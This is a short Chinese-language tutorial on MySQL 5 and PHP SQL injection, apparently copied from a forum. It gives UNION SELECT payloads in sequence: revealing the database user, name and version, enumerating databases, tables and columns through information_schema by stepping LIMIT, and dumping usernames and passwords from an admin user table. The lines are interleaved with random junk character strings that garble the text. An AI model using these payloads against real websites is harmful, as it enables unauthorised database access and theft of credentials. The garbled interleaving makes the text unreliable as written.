2 r& w" I. }7 ^% C5 R: d# ]教程内容:Mysql 5+php 注入1 R5 B! j( z( Z- K8 x
/ k, E1 L( V" \4 W4 h: f
$ @7 Q# s, ?6 O* \' r
& u: B- S( {" d- N! J一.查看MYSQL基本信息(库名,版本,用户)) l- r9 q4 d# n
; n" t k9 _; p8 O: }# W) b! l
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/* D2 v5 ^5 A- r5 Y
. p( V9 N3 p v1 ?5 i
二.查数据库
+ o6 c1 g. `. P; _1 ~0 {: V% C3 d1 ?: D4 K* _8 C$ y3 {
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*$ p, F) ~7 a) I# v+ T
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。7 j0 J3 s8 Q4 e' y
3 F8 Q$ b9 t m! |三.暴表+ {/ z0 J- i1 ] h
; E2 r, f6 B. iand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*" f' c6 H: P" K! F m1 z8 {
0 c" M# B$ s( ? v) E0 ^' b/ a' h9 xlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
7 N8 t1 q. J+ B+ `& m' U8 e, U: R+ }* ^- V! G1 g$ P6 _1 W
四.暴字段+ P2 `4 V1 S4 U, X0 L2 c' N* O; o
& h" Z6 W, `, Cand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*- [& c# g8 c: [1 p- o/ M% p
9 S d5 c8 [0 {" R3 V3 {3 hlimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。" L l W" d& l
1 G# U) j1 N; u/ {- K
五.暴数据
7 H7 e! u: n7 V* B2 l6 U9 ]2 ]: r% C3 E- W
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*( ^) g8 s, ?) s
0 l# } f4 ^; m$ q6 ~, w% H2 Q
2 s1 }5 A9 |% K3 D这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。2 G, ~6 W7 I1 ~" U
|